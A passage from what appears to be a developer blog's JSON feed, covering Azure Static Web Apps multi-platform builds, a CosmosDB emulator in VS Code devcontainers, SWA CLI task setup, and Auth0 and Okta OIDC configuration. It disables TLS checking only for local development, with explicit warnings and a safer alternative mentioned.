###### # For more information regarding Static Web App workflow configurations, please visit: https://aka.ms/swaworkflowconfig app_location: "Client" # App source code path api_location: "Api" # Api source code path - optional output_location: "wwwroot" # Built app content directory - optional ###### End of Repository/Build Configurations ###### Now, when the job runs, it’ll build as many platforms as it finds!\n---Oryx build logs--- Operation performed by Microsoft Oryx, https://github.com/Microsoft/Oryx You can report issues at https://github.com/Microsoft/Oryx/issues Oryx Version: 0.2.20210410.1, Commit: e73613ae1fd73c809c00f357f8df91eb984e1158, ReleaseTagName: 20210410.1 Build Operation ID: |aGA1C0DlxfI=.73b3d0f3_ Repository Commit : 9cbf3cd5964436820377935e5ba176f72bbcda11 Detecting platforms... Detected following platforms: nodejs: 14.15.1 dotnet: 3.1.15 Version '14.15.1' of platform 'nodejs' is not installed. Generating script to install it... Version '3.1.15' of platform 'dotnet' is not installed. Generating script to install it... Source directory : /github/workspace/Client Destination directory: /bin/staticsites/ss-oryx/app Downloading and extracting 'nodejs' version '14.15.1' to '/tmp/oryx/platforms/nodejs/14.15.1'... Downloaded in 1 sec(s). Verifying checksum... Extracting contents... Done in 2 sec(s). Downloading and extracting 'dotnet' version '3.1.409' to '/tmp/oryx/platforms/dotnet/3.1.409'... Downloaded in 1 sec(s). Verifying checksum... Extracting contents... Done in 4 sec(s). Using Node version: v14.15.1 Using Npm version: 6.14.8 Running 'npm install --unsafe-perm'... npm notice created a lockfile as package-lock.json. You should commit this file. npm WARN Client@1.0.0 No description npm WARN Client@1.0.0 No repository field. up to date in 0.231s found 0 vulnerabilities Running 'npm run build'... > Client@1.0.0 build /github/workspace/Client > tsc Using .NET Core SDK Version: 3.1.409 Welcome to .NET Core 3.1! --------------------- SDK Version: 3.1.409 Telemetry --------- The .NET Core tools collect usage data in order to help us improve your experience. It is collected by Microsoft and shared with the community. You can opt-out of telemetry by setting the DOTNET_CLI_TELEMETRY_OPTOUT environment variable to '1' or 'true' using your favorite shell. Read more about .NET Core CLI Tools telemetry: https://aka.ms/dotnet-cli-telemetry ---------------- Explore documentation: https://aka.ms/dotnet-docs Report issues and find source on GitHub: https://github.com/dotnet/core Find out what's new: https://aka.ms/dotnet-whats-new Learn about the installed HTTPS developer cert: https://aka.ms/aspnet-core-https Use 'dotnet --help' to see available commands or visit: https://aka.ms/dotnet-cli-docs Write your first app: https://aka.ms/first-net-core-app -------------------------------------------------------------------------------------- Determining projects to restore... Restored /github/workspace/Shared/Shared.csproj (in 817 ms). Restored /github/workspace/Client/Client.csproj (in 1.58 sec). Publishing to directory /bin/staticsites/ss-oryx/app... Microsoft (R) Build Engine version 16.7.2+b60ddb6f4 for .NET Copyright (C) Microsoft Corporation. All rights reserved. Determining projects to restore... All projects are up-to-date for restore. 
Shared -> /github/workspace/Shared/bin/Release/netstandard2.0/Shared.dll Client -> /github/workspace/Client/bin/Release/netstandard2.1/Client.dll Client (Blazor output) -> /github/workspace/Client/bin/Release/netstandard2.1/wwwroot Client -> /bin/staticsites/ss-oryx/app/ Preparing output... Removing existing manifest file Creating a manifest file... Manifest file created. Done in 29 sec(s). ---End of Oryx build logs--- You’ll now see in the build output that we did our TypeScript compile step, followed by the appropriate dotnet steps.\nConclusion With Static Web Apps being generally available we’re seeing people tackling more complex scenarios, and this can lead to using multiple platforms together in the same project. By default the SWA build job won’t build all platforms, but by setting ENABLE_MULTIPLATFORM_BUILD to true on it, we can solve those problems.\n", "id": "2021-06-24-blazor-typescript-and-static-web-apps" }, { "title": "Supercharging a Web Devs Toolbox", "url": "https://www.aaron-powell.com/posts/2021-06-03-supercharging-a-web-devs-toolbox/", "date": "Thu, 03 Jun 2021 00:17:53 +0000", "tags": [ "javascript", "webdev", "vscode" ], "description": "There's so many awesome new tools to make web dev easier, let's check some of them out.", "content": "I recently gave a talk at the Microsoft Reactor showing off a bunch of tools that I think are super powerful when doing web development that some folks might not know of.\nYou can catch the recording on YouTube.\n", "id": "2021-06-03-supercharging-a-web-devs-toolbox" }, { "title": "Local Dev With CosmosDB and devcontainers", "url": "https://www.aaron-powell.com/posts/2021-05-27-local-dev-with-cosmosdb-and-devcontainers/", "date": "Thu, 27 May 2021 03:42:47 +0000", "tags": [ "javascript", "vscode", "cosmosdb" ], "description": "I'm mad about devcontainers, so let's take it to the limits!", "content": "When I was a consultant the nirvana that I tried to achieve on projects was to be able to clone them from source control and have everything ready to go, no wiki pages to follow on what tools to install, no unmaintained setup scripts, just clone + install dependencies. This is why I love VS Code Remote Containers, aka devcontainers.\nI’ve previously said all projects need devcontainers, that they are an essential tool for workshops and might go overboard on it locally…\nI'm a huge fan of @code devcontainers, but maybe I'm going overboard... 🤣 pic.twitter.com/szarhTFDgN\n— Aaron Powell (@slace) May 10, 2021 Yes, I really had 23 devcontainers on my machine. These days I don’t do any development on my machine, it all happens inside a container.\nThis works well for dev, I can run the web servers/APIs/etc. just fine, but there’s one piece that is more difficult… storage. Since I’m commonly using CosmosDB as the backend, I end up having a CosmosDB instance deployed to work against. While this is fine for me, if I’m creating a repo for others to use or a workshop to follow along with, there’s a hard requirement on deploying a CosmosDB service, which adds overhead to getting started.\nFor a while there has been a CosmosDB emulator, but it’s a Windows emulator and that still means a series of steps to install it beyond what can be in the Git repo, and I hadn’t had any luck connecting to it from a devcontainer.\nThings changed this week with Microsoft Build, a preview of a Linux emulator was released. 
Naturally I had to take it for a spin.\nSetting up the emulator The emulator is available as a Docker image, which means it’s pretty easy to setup, just pull the image:\n1 $> docker pull mcr.microsoft.com/cosmosdb/linux/azure-cosmos-emulator And then start a container:\n1 docker run -p 8081:8081 -p 10251:10251 -p 10252:10252 -p 10253:10253 -p 10254:10254 --name=cosmos -it mcr.microsoft.com/cosmosdb/linux/azure-cosmos-emulator This runs it locally, which is all well and good, but I want to use it with VS Code and devcontainers.\nCosmos devcontainers A devcontainer is, as the name suggests, where you do your development, and since we need to development against CosmosDB it could make sense to use the emulator image as the base image and then add all the other stuff we need, like Node, dotnet, etc.\nWhile this is a viable option, I feel like it’s probably not the simplest way. First off, you have a mega container that will be running, and if you want to change anything about the dev environment, you’ll end up trashing everything, including any data you might have. Also, the emulator image is pretty slimmed down, it doesn’t have runtimes like Node or dotnet installed, so you’ll need to add the appropriate apt sources, install the runtimes, etc. Very doable, but I think that’s not the best way to tackle.\nEnter Docker Compose.\nI only recently learnt that devcontainers support Docker Compose, meaning you can create a more complex environment stack and have VS Code start it all up for you.\nLet’s take the Node.js quickstart (full docs here) and run it in a devcontainer.\nOur devcontainer Dockerfile We’ll park the CosmosDB emulator for a moment and look at the Dockerfile we’ll need for this codebase.\nFollow the VS Code docs to scaffold up the devcontainer definition and let’s start hacking.\nNote: You may need to select “Show All Definitions” to get to the Docker Compose option, also, it’ll detect you’ve added the .devcontainer folder and prompt to open it in a container, but we’ll hold off for now until we set everything up.\nThe app is a Node.js app so we probably want to use that as our base image. Start by changing the base image to the Node.js image:\n1 2 ARG VARIANT="16-buster" FROM mcr.microsoft.com/vscode/devcontainers/javascript-node:0-${VARIANT} We’ll want to ensure we have the right version of Node installed, so we’ll allow the flexibility of passing that in as a container argument, but default to 16 as the Node.js version.\nSetting up Docker Compose Our Dockerfile is ready for the devcontainer, and we can run it just fine, but we want it to be part of a composed environment, so it’s time to finish off the Docker Compose file.\nThe one that was scaffolded up for us already has what we need for the app, all that we need to do is add the CosmosDB emulator as a service.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 version: "3" services: cosmos: image: mcr.microsoft.com/cosmosdb/linux/azure-cosmos-emulator:latest mem_limit: 3g cpu_count: 2 environment: AZURE_COSMOS_EMULATOR_PARTITION_COUNT: 10 AZURE_COSMOS_EMULATOR_ENABLE_DATA_PERSISTENCE: "true" volumes: # Forwards the local Docker socket to the container. - /var/run/docker.sock:/var/run/docker-host.sock app: # snip We’ve added a new service called cosmos (obvious huh!) that uses the image for the emulator and passes in the environment variables to control startup. 
We’ll also mount the Docker socket, just in case we need it later on.\nThere’s one final thing we need to configure before we open in the container, and that is to expose the CosmosDB emulator via the devcontainer port mapping. Now, it’s true we can do port mapping with the Docker Compose file, if you are running this environment via VS Code it does some hijacking of the port mapping, so we expose ports in the devcontainer.json file, not the docker-compose.yml file (this is more important if you’re using it with Codespaces as well, since then you don’t have access to the Docker host). But if we add the port forwarding in the devcontainer.json it won’t know that we want to expose a port from our cosmos service, as that’s not the main container for VS Code. Instead, we need to map the service into our app’s network with network_mode: service:cosmos:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 services: cosmos: # snip app: build: context: . dockerfile: Dockerfile.compose args: USER_UID: 1000 USER_GID: 1000 VARIANT: 16 init: true volumes: - /var/run/docker.sock:/var/run/docker-host.sock - ..:/workspace:cached entrypoint: /usr/local/share/docker-init.sh command: sleep infinity network_mode: service:cosmos Tweaking the devcontainer.json Our environment is ready to go, but if you were to launch it, the devcontainer won’t start because of the following error:\n[2209 ms] Start: Run in container: uname -m [2309 ms] Start: Run in container: cat /etc/passwd [2309 ms] Stdin closed! [2312 ms] Shell server terminated (code: 126, signal: null) unable to find user vscode: no matching entries in passwd file The problem here is that the base Docker image we’re using has created a user to run everything as named node, but the devcontainer.json file specifies the remoteUser as vscode:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 // For format details, see https://aka.ms/devcontainer.json. For config options, see the README at: // https://github.com/microsoft/vscode-dev-containers/tree/v0.179.0/containers/docker-from-docker-compose { "name": "Docker from Docker Compose", "dockerComposeFile": "docker-compose.yml", "service": "app", "workspaceFolder": "/workspace", // Use this environment variable if you need to bind mount your local source code into a new container. "remoteEnv": { "LOCAL_WORKSPACE_FOLDER": "${localWorkspaceFolder}" }, // Set *default* container specific settings.json values on container create. "settings": { "terminal.integrated.shell.linux": "/bin/bash" }, // Add the IDs of extensions you want installed when the container is created. "extensions": ["ms-azuretools.vscode-docker"], // Use 'forwardPorts' to make a list of ports inside the container available locally. // "forwardPorts": [], // Use 'postCreateCommand' to run commands after the container is created. // "postCreateCommand": "docker --version", // Comment out connect as root instead. More info: https://aka.ms/vscode-remote/containers/non-root. "remoteUser": "vscode" } We can change the remoteUser to node and everything is ready to go. But while we’re in the devcontainer.json file, let’s add some more extensions:\n1 2 3 4 5 6 "extensions": [ "ms-azuretools.vscode-docker", "dbaeumer.vscode-eslint", "esbenp.prettier-vscode", "ms-azuretools.vscode-cosmosdb" ], This will give us eslint + prettier (my preferred linter and formatter), as well as the CosmosDB tools for VS Code. 
I also like to add npm install as the postCreateCommand, so all the npm packages are installed before I start to use the container.\nConnecting to the CosmosDB emulator The emulator is running in a separate container to our workspace, you can see that with docker ps on your host:\n➜ docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES a883d9a21499 azure-cosmos-db-sql-api-nodejs-getting-started_devcontainer_app "/usr/local/share/do…" 4 minutes ago Up 4 minutes azure-cosmos-db-sql-api-nodejs-getting-started_devcontainer_app_1 c03a7a625470 mcr.microsoft.com/cosmosdb/linux/azure-cosmos-emulator:latest "/usr/local/bin/cosm…" 20 minutes ago Up 4 minutes azure-cosmos-db-sql-api-nodejs-getting-started_devcontainer_cosmos_1 So how do we address it from our app? either using its hostname or its IP address. I prefer to use the hostname, which is the name of the service in our docker-compose.yml file, so cosmos and it’s running on port 8081. For the Account Key, we get a standard one that you’ll find in the docs.\nOpen config.js and fill in the details:\n1 2 3 4 5 6 7 8 9 10 11 12 // @ts-check const config = { endpoint: "https://cosmos:8081/", key: "C2y6yDjf5/R+ob0N8A7Cgv30VRDJIWEHLM+4QDU5DE2nQ9nDuVTqobD4b8mGGyPMbIZnqyMsEcaGQy67XIw/Jw==", databaseId: "Tasks", containerId: "Items", partitionKey: { kind: "Hash", paths: ["/category"] } }; module.exports = config; Now open the terminal and run node app.js to run the app against the emulator.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 node ➜ /workspace (main ✗) $ node app.js /workspace/node_modules/node-fetch/lib/index.js:1455 reject(new FetchError(`request to ${request.url} failed, reason: ${err.message}`, 'system', err)); ^ FetchError: request to https://cosmos:8081/ failed, reason: self signed certificate at ClientRequest.<anonymous> (/workspace/node_modules/node-fetch/lib/index.js:1455:11) at ClientRequest.emit (node:events:365:28) at TLSSocket.socketErrorListener (node:_http_client:447:9) at TLSSocket.emit (node:events:365:28) at emitErrorNT (node:internal/streams/destroy:193:8) at emitErrorCloseNT (node:internal/streams/destroy:158:3) at processTicksAndRejections (node:internal/process/task_queues:83:21) { type: 'system', errno: 'DEPTH_ZERO_SELF_SIGNED_CERT', code: 'DEPTH_ZERO_SELF_SIGNED_CERT', headers: { 'x-ms-throttle-retry-count': 0, 'x-ms-throttle-retry-wait-time-ms': 0 } } Oh, it went 💥. That’s not what we wanted…\nIt turns out that we’re missing something. Node.js uses a defined list of TLS certificates, and doesn’t support self-signed certificates. The CosmosDB SDK handles this for localhost, which is how the emulator is designed to be used, but we’re not able to access it on localhost (unless maybe if you named the service that in the compose file, but that’s probably a bad idea…), so we have to work around this by disabling TLS.\nNote: Disabling TLS is not really a good idea, but it’s the only workaround we’ve got. Just don’t disable it on any production deployments!\nOpen the devcontainer.json file, as we can use this to inject environment variables into the container when it starts up, using the remoteEnv section:\n1 2 3 4 "remoteEnv": { "LOCAL_WORKSPACE_FOLDER": "${localWorkspaceFolder}", "NODE_TLS_REJECT_UNAUTHORIZED": "0" }, We’ll set NODE_TLS_REJECT_UNAUTHORIZED to 0, which will tell Node.js to ignore TLS errors. 
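With that in place, the connection the quickstart makes boils down to roughly this (a sketch using the @azure/cosmos SDK and the values from config.js above, not the quickstart's full app.js):
import { CosmosClient } from "@azure/cosmos";
import config from "./config";

// config.endpoint is https://cosmos:8081/, the compose service name for the emulator.
const client = new CosmosClient({ endpoint: config.endpoint, key: config.key });

async function main() {
  const { database } = await client.databases.createIfNotExists({ id: config.databaseId });
  const { container } = await database.containers.createIfNotExists({
    id: config.containerId,
    partitionKey: config.partitionKey
  });
  console.log(`Connected to ${database.id}/${container.id} at ${config.endpoint}`);
}

main().catch(console.error);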
Setting NODE_TLS_REJECT_UNAUTHORIZED to 0 will result in a warning on the terminal when the app runs, just a reminder that you shouldn’t do this in production!\nNow the environment needs to be recreated; reload VS Code and it’ll detect the changes to the devcontainer.json file and ask if you want to rebuild the environment. Click Rebuild and in a few moments your environment will be recreated (a lot quicker this time as the images already exist!), and you can open the terminal to run the app again:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 node ➜ /workspace (main ✗) $ node app.js (node:816) Warning: Setting the NODE_TLS_REJECT_UNAUTHORIZED environment variable to '0' makes TLS connections and HTTPS requests insecure by disabling certificate verification. (Use `node --trace-warnings ...` to show where the warning was created) Created database: Tasks Created container: Items Querying container: Items Created new item: 3 - Complete Cosmos DB Node.js Quickstart ⚡ Updated item: 3 - Complete Cosmos DB Node.js Quickstart ⚡ Updated isComplete to true Deleted item with id: 3 🎉 Tada! The sample is running against the CosmosDB emulator within a Docker container, being called from another Docker container.\nConclusion Throughout this post we’ve seen how we can create a complex environment with VS Code Remote Containers (aka, devcontainers), which uses the CosmosDB emulator to do local dev of a Node.js app against CosmosDB.\nYou’ll find my sample on GitHub, should you want to spin it up.\nAlternative solution After posting this article I got into a Twitter discussion in which it looks like there might be another solution to this that doesn’t require disabling TLS. Noel Bundick has an example repo that uses the NODE_EXTRA_CA_CERTS environment variable to add the cert that comes with the emulator to Node.js at runtime, rather than disabling TLS. It’s a bit more clunky as you’ll need to run a few more steps once the devcontainer starts, but do check it out as an option.\n", "id": "2021-05-27-local-dev-with-cosmosdb-and-devcontainers" }, { "title": "Leveling Up Static Web Apps With the CLI", "url": "https://www.aaron-powell.com/posts/2021-05-25-leveling-up-static-web-apps-with-the-cli/", "date": "Tue, 25 May 2021 05:32:36 +0000", "tags": [ "javascript", "serverless", "vscode" ], "description": "Let's check out the Azure Static Web Apps CLI and how to use it with VS Code", "content": "With the Azure Static Web Apps GA there was a sneaky little project that my colleague Wassim Chegham dropped, the Static Web Apps CLI.\nThe SWA CLI is a tool he’s been building for a while with the aim to make it easier to do local development, especially if you want to do an authenticated experience. I’ve been helping out on making sure it works on Windows and for Blazor/.NET apps.\nIt works by running as a proxy server in front of the web and API components, giving you a single endpoint that you access the site via, much like when it’s deployed to Azure. It also will inject a mock auth token if you want to create an authenticated experience, and enforce the routing rules that are defined in the staticwebapp.config.json file. By default, it’ll want to serve static content from a folder, but my preference is to proxy the dev server from create-react-app, so I can get hot reloading and stuff working. Let’s take a look at how we can do that.\nUsing the cli with VS Code With VS Code being my editor of choice, I wanted to work out the best way to work with it and the SWA CLI, so I can run a task and have it started.
But as I prefer to use it as a proxy, this really requires me to run three tasks, one of the web app, one for the API and one for the CLI.\nSo, let’s start creating a tasks.json file:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 { "version": "2.0.0", "tasks": [ { "type": "npm", "script": "start", "label": "npm: start", "detail": "react-scripts start", "isBackground": true }, { "type": "npm", "script": "start", "path": "api/", "label": "npm: start - api", "detail": "npm-run-all --parallel start:host watch", "isBackground": true }, { "type": "shell", "command": "swa start http://localhost:3000 --api http://localhost:7071", "dependsOn": ["npm: start", "npm: start - api"], "label": "swa start", "problemMatcher": [], "dependsOrder": "parallel" } ] } The first two tasks will run npm start against the respective parts of the app, and you can see from the detail field what they are running. Both of these will run in the background of the shell (don’t need it to pop up to the foreground) but there’s a catch, they are running persistent commands, commands that don’t end and this has a problem.\nWhen we want to run swa start, it’ll kick off the two other tasks but using dependent tasks in VS Code means it will wait until the task(s) in the dependsOn are completed. Now, this is fine if you run a task that has an end (like tsc), but if you’ve got a watch going (tsc -w), well, it’s not ending and the parent task can’t start.\nUnblocking blocking processes We need to run two blocking processes but trick VS Code into thinking they are completed so we can run the CLI. It turns out we can do that by customising the problemMatcher part of our task with a background section. The important part here is defining some endPattern regex’s. Let’s start with the web app, which in this case is going to be using create-react-app, and the last message it prints once the server is up and running is:\nTo create a production build, use npm run build.\nGreat, we’ll look for that in the output, and if it’s found, treat it as the command is done.\nThe API is a little trickier though, as it’s running two commands, func start and tsc -w, and it’s doing that in parallel, making our output stream a bit messy. We’re mostly interested on when the Azure Functions have started up, and if we look at the output the easiest message to regex is probably:\nFor detailed output, run func with –verbose flag.\nIt’s not the last thing that’s output, but it’s close to and appears after the Functions are running, so that’ll do.\nNow that we know what to look for, let’s configure the problem matcher.\nUpdating our problem matchers To do what we need to do we’re going to need to add a problemMatcher section to the task and it’ll need to implement a full problemMatcher. Here’s the updated task for the web app:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 { "type": "npm", "script": "start", "problemMatcher": { "owner": "custom", "pattern": { "regexp": "^([^\\\\s].*)\\\\((\\\\d+|\\\\d+,\\\\d+|\\\\d+,\\\\d+,\\\\d+,\\\\d+)\\\\):\\\\s+(error|warning|info)\\\\s+(TS\\\\d+)\\\\s*:\\\\s*(.*)$", "file": 1, "location": 2, "severity": 3, "code": 4, "message": 5 }, "fileLocation": "relative", "background": { "activeOnStart": true, "beginsPattern": "^\\\\.*", "endsPattern": "^\\\\.*To create a production build, use npm run build\\\\." 
} }, "label": "npm: start", "detail": "react-scripts start", "isBackground": true } Since create-react-app doesn’t have a standard problemMatcher in VS Code (as far as I can tell anyway) we’re going to set the owner as custom and then use the TypeScript pattern (which I shamelessly stole from the docs 🤣). You might need to tweak the regex to get the VS Code problems list to work properly, but this will do for now. With our basic problemMatcher defined, we can add a background section to it and specify the endsPattern to match the string we’re looking for. You’ll also have to provide a beginsPattern, to which I’m lazy and just matching on anything.\nLet’s do a similar thing for the API task:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 { "type": "npm", "script": "start", "path": "api/", "problemMatcher": { "owner": "typescript", "pattern": { "regexp": "^([^\\\\s].*)\\\\((\\\\d+|\\\\d+,\\\\d+|\\\\d+,\\\\d+,\\\\d+,\\\\d+)\\\\):\\\\s+(error|warning|info)\\\\s+(TS\\\\d+)\\\\s*:\\\\s*(.*)$", "file": 1, "location": 2, "severity": 3, "code": 4, "message": 5 }, "background": { "activeOnStart": true, "beginsPattern": "^\\\\.*", "endsPattern": ".*For detailed output, run func with --verbose flag\\\\..*" } }, "label": "npm: start - api", "detail": "npm-run-all --parallel start:host watch", "isBackground": true } Now, we can run the swa start task and everything will launch for us!\nConclusion Azure Static Web Apps just keeps getting better and better. With the CLI, it’s super easy to run a local environment and not have to worry about things like CORS, making it closer to how the deployed app operates. And combining it with these VS Code tasks means that with a few key presses you can get it up and running.\nI’ve added these tasks to the GitHub repo of my Auth0 demo app from the post on using Auth0 with Static Web Apps\n", "id": "2021-05-25-leveling-up-static-web-apps-with-the-cli" }, { "title": "Using Auth0 With Static Web Apps", "url": "https://www.aaron-powell.com/posts/2021-05-13-using-auth0-with-static-web-apps/", "date": "Wed, 12 May 2021 22:49:11 +0000", "tags": [ "javascript", "serverless" ], "description": "With Azure Static Web Apps supporting custom authentication, let's look at how we can use Auth0 as a provider.", "content": "One of my favorite features of (the now General Available) Azure Static Web Apps (SWA) is that in the Standard Tier you can now provide a custom OpenID Connect (OIDC) provider. This gives you a lot more control over who can and can’t access your app.\nIn this post, I want to look at how we can use Auth0 and an OIDC provider for Static Web Apps.\nFor this, you’ll need an Auth0 account, so if you don’t already have one go sign up and maybe have a read of their docs, just so you’re across everything.\nCreating a Static Web App For this demo, we’ll use the React template, but what we’re covering isn’t specific to React, it’ll be applicable anywhere.\nOnce you’ve created your app, we’re going to need to setup a configuration file, so add staticwebapp.config.json to the repo root.\nThis config file is used for controlling a lot of things within our SWA, but the most important part for us is going to be the auth section. Let’s flesh out the skeleton for it:\n1 2 3 4 5 6 7 { "auth": { "identityProviders": { "customOpenIdConnectProviders": {} } } } Great! 
Now it’s time to setup Auth0.\nCreating an Auth0 application Log into the Auth0 dashboard and navigate through to the Applications section of the portal:\nFrom here, we’re going to select Create Application, give it a name and select Regular Web Applications as the application type. You might be tempted to select the SPA option, given that we’re creating a JavaScript web application, but the reason we don’t use that is that SWA’s auth isn’t handled by your application itself, it’s handled by the underlying Azure service, which is a “web application”, that then exposes the information out that you need.\nConfigure your Auth0 application With your application created, it’s time to configure it. We’ll skip the Quick Start options, as we’re really doing something more custom. Instead, head to Settings as we are going to need to provide the application with some redirect options for login/logout, so that SWA will know you’ve logged in and can unpack the basic user information.\nFor the Sign-in redirect URIs you will need to add https://<hostname>/.auth/login/auth0 for the Application Login URI, https://<hostname>/.auth/login/auth0/callback for Allowed Callback URLs and for Allowed Logout URLs add https://<hostname>/.auth/logout/auth0/callback. If you haven’t yet deployed to Azure, don’t worry about this step yet, we’ll do it once the SWA is created.\nQuick note - the auth0 value here is going to be how we name the provider in the staticwebapp.config.json, so it can be anything you want, I just like to use the provider name so the config is easy to read.\nScroll down and click Save Changes, and it’s time to finish off our SWA config file.\nCompleting our settings With our Auth0 application setup, it’s time to complete our config file so it can use it. We’ll add a new configuration under customOpenIdConnectProviders for Auth0 and it’ll contain two core pieces of information, the information on how to register the OIDC provider and some login information on how to talk to the provider.\nInside registration, we’ll add a clientIdSettingName field, which will point to an entry in the app settings that the SWA has. Next, we’ll need a clientCredential object that has clientSecretSettingName that is the entry for the OIDC client secret. Lastly, we’ll provide the openIdConnectConfiguration with a wellKnownOpenIdConfiguration endpoint that is https://<your_auth0_domain>/.well-known//openid-configuration.\nThe config should now look like this:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 { "auth": { "identityProviders": { "customOpenIdConnectProviders": { "auth0": { "registration": { "clientIdSettingName": "AUTH0_ID", "clientCredential": { "clientSecretSettingName": "AUTH0_SECRET" }, "openIdConnectConfiguration": { "wellKnownOpenIdConfiguration": "https://aaronpowell.au.auth0.com/.well-known/openid-configuration" } } } } } } } I use AUTH0_ID and AUTH0_SECRET as the names of the items I’ll be putting into app settings.\nAll this information will tell SWA how to issue a request against the right application in Auth0, but we still need to tell it how to make the request and handle the response. That’s what we use the login config for. With the login config, we provide a nameClaimType, which is a fully-qualified path to the claim that we want SWA to use as the userDetails field of the user info. Generally speaking, you’ll want this to be http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name, but if there’s a custom field in your response claims you want to use, make sure you provide that. 
The other bit of config we need here is what scopes to request from Auth0. For SWA, you only need openid and profile as the scopes, unless you’re wanting to use a nameClaimType other than standard.\nLet’s finish off our SWA config:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 { "auth": { "identityProviders": { "customOpenIdConnectProviders": { "auth0": { "registration": { "clientIdSettingName": "AUTH0_ID", "clientCredential": { "clientSecretSettingName": "AUTH0_SECRET" }, "openIdConnectConfiguration": { "wellKnownOpenIdConfiguration": "https://aaronpowell.au.auth0.com/.well-known/openid-configuration" } }, "login": { "nameClaimType": "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name", "scopes": ["openid", "profile"] } } } } } } With the config ready you can create the SWA in Azure and kick off a deployment (don’t forget to update the Auth0 app with the login/logout callbacks). When the resource is created in Azure, copy the Client ID and Client secret from Auth0 and create app settings in Azure using the names in your config and the values from Auth0.\nUsing the provider Once the provider is registered in the config file, it is usable just like the other providers SWA offers, with the login being /.auth/login/<provider_name>, which in this case the provider_name is auth0. The user information will then be exposed as standard to both the web and API components.\nIf you’re building a React application, check out my React auth helper and for the API there is a companion.\nConclusion I really like that with the GA of Static Web Apps we are now able to use custom OIDC providers with the platform. This makes it a lot easier to have controlled user access and integration with a more complex auth story when needed. Setting this up with Auth0 only takes a few lines of config.\nYou can check out a full code sample on my GitHub and a live demo here (but I’m not giving you my Auth0 credentials 😝).\n", "id": "2021-05-13-using-auth0-with-static-web-apps" }, { "title": "Using Okta With Static Web Apps", "url": "https://www.aaron-powell.com/posts/2021-05-13-using-okta-with-static-web-apps/", "date": "Wed, 12 May 2021 22:49:11 +0000", "tags": [ "javascript", "serverless" ], "description": "With Azure Static Web Apps supporting custom authentication, let's look at how we can use Okta as a provider.", "content": "One of my favorite features of (the now General Available) Azure Static Web Apps (SWA) is that in the Standard Tier you can now provide a custom OpenID Connect (OIDC) provider. This gives you a lot more control over who can and can’t access your app.\nIn this post, I want to look at how we can use Okta and an OIDC provider for Static Web Apps.\nFor this, you’ll need an Okta account, so if you don’t already have one go sign up and maybe have a read of their docs, just so you’re across everything.\nCreating a Static Web App For this demo, we’ll use the React template, but what we’re covering isn’t specific to React, it’ll be applicable anywhere.\nOnce you’ve created your app, we’re going to need to setup a configuration file, so add staticwebapp.config.json to the repo root.\nThis config file is used for controlling a lot of things within our SWA, but the most important part for us is going to be the auth section. Let’s flesh out the skeleton for it:\n1 2 3 4 5 6 7 { "auth": { "identityProviders": { "customOpenIdConnectProviders": {} } } } Great! 
Now it’s time to setup Okta.\nCreating an Okta application Log into the Okta dashboard and navigate through to the Applications section of the portal:\nFrom here, we’re going to select Create App Integration and select OIDC - OpenID Connect for the Sign-on method and Web Application as the Application type. You might be tempted to select the SPA option, given that we’re creating a JavaScript web application, but the reason we don’t use that is that SWA’s auth isn’t handled by your application itself, it’s handled by the underlying Azure service, which is a “web application”, that then exposes the information out that you need.\nConfigure your Okta application With your application created, it’s time to configure it. Give it a name, something that’ll make sense when you see it in the list of Okta applications, a logo if you desire, but leave the Grant type information alone, the defaults are configured for us just fine.\nWe are going to need to provide the application with some redirect options for login/logout, so that SWA will know you’ve logged in and can unpack the basic user information.\nFor the Sign-in redirect URIs you will need to add https://<hostname>/.auth/login/okta/callback and for Sign-out redirect URIs add https://<hostname>/.auth/logout/okta/callback. If you haven’t yet deployed to Azure, don’t worry about this step yet, we’ll do it once the SWA is created.\nQuick note - the okta value here is going to be how we name the provider in the staticwebapp.config.json, so it can be anything you want, I just like to use the provider name so the config is easy to read.\nClick Save, and it’s time to finish off our SWA config file.\nCompleting our settings With our Okta application setup, it’s time to complete our config file so it can use it. We’ll add a new configuration under customOpenIdConnectProviders for Okta and it’ll contain two core pieces of information, the information on how to register the OIDC provider and some login information on how to talk to the provider.\nInside registration, we’ll add a clientIdSettingName field, which will point to an entry in the app settings that the SWA has. Next, we’ll need a clientCredential object that has clientSecretSettingName that is the entry for the OIDC client secret. Lastly, we’ll provide the openIdConnectConfiguration with a wellKnownOpenIdConfiguration endpoint that is https://<your_okta_domain>/.well-known//openid-configuration.\nThe config should now look like this:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 { "auth": { "identityProviders": { "customOpenIdConnectProviders": { "okta": { "registration": { "clientIdSettingName": "OKTA_ID", "clientCredential": { "clientSecretSettingName": "OKTA_SECRET" }, "openIdConnectConfiguration": { "wellKnownOpenIdConfiguration": "https://dev-920852.okta.com/.well-known/openid-configuration" } } } } } } } I use OKTA_ID and OKTA_SECRET as the names of the items I’ll be putting into app settings.\nAll this information will tell SWA how to issue a request against the right application in Okta, but we still need to tell it how to make the request and handle the response. That’s what we use the login config for. With the login config, we provide a nameClaimType, which is a fully-qualified path to the claim that we want SWA to use as the userDetails field of the user info. Generally speaking, you’ll want this to be http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name, but if there’s a custom field in your response claims you want to use, make sure you provide that. 
